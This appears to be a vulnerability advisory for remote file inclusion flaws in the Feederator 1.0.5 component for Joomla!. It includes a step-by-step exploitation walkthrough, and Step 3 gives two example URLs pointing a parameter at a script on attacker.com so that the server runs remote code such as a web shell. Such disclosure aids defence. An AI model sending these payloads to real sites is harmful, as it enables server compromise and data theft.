Multiple PHP remote file inclusion vulnerabilities in the Recly Interactive Feederator (com_feederator) component 1.0.5 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) mosConfig_absolute_path parameter to (a) add_tmsp.php, (b) edit_tmsp.php and (c) tmsp.php in includes/tmsp/; and the (2) GLOBALS[mosConfig_absolute_path] parameter to (d) includes/tmsp/subscription.php.
Critical vulnerability in the Recly Interactive Feederator component for Joomla! allows remote attackers to execute arbitrary PHP code. Exploitation involves injecting malicious code through the mosConfig_absolute_path parameter, leading to complete system compromise if successful.
Step 1: Identify Vulnerable Target: The attacker identifies a Joomla! website using the vulnerable Recly Interactive Feederator component (version 1.0.5).
Step 2: Craft Malicious Payload: The attacker creates a malicious PHP script containing the desired commands (e.g., a web shell) and hosts it on a publicly accessible server.
Step 3: Exploit Delivery: The attacker crafts a malicious URL that exploits the RFI vulnerability by setting the mosConfig_absolute_path parameter to the URL of the attacker's malicious PHP script. For example: http://target.com/index.php?option=com_feederator&mosConfig_absolute_path=http://attacker.com/malicious.php (for add_tmsp.php, edit_tmsp.php, or tmsp.php) or http://target.com/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=http://attacker.com/malicious.php
Step 4: Code Execution: When the vulnerable PHP file attempts to include the file specified by mosConfig_absolute_path, the attacker's malicious PHP script is executed on the server.
Step 5: System Compromise: The attacker's malicious PHP script, typically a web shell, allows the attacker to execute arbitrary commands on the server, potentially leading to complete system compromise, including data theft, defacement, or further exploitation.
The vulnerability stems from insufficient input validation and sanitization of the mosConfig_absolute_path parameter within the Recly Interactive Feederator component. The component uses this parameter to include files, but it fails to properly validate the user-supplied input. This allows an attacker to specify a URL pointing to a malicious PHP script hosted on a remote server. When the vulnerable PHP files (add_tmsp.php, edit_tmsp.php, tmsp.php, and subscription.php) attempt to include the file specified by the attacker-controlled mosConfig_absolute_path, the attacker's malicious code is executed on the server. The root cause is a remote file inclusion (RFI) vulnerability due to the lack of proper input validation and sanitization of the path used in the include() or require() functions. This allows for arbitrary code execution.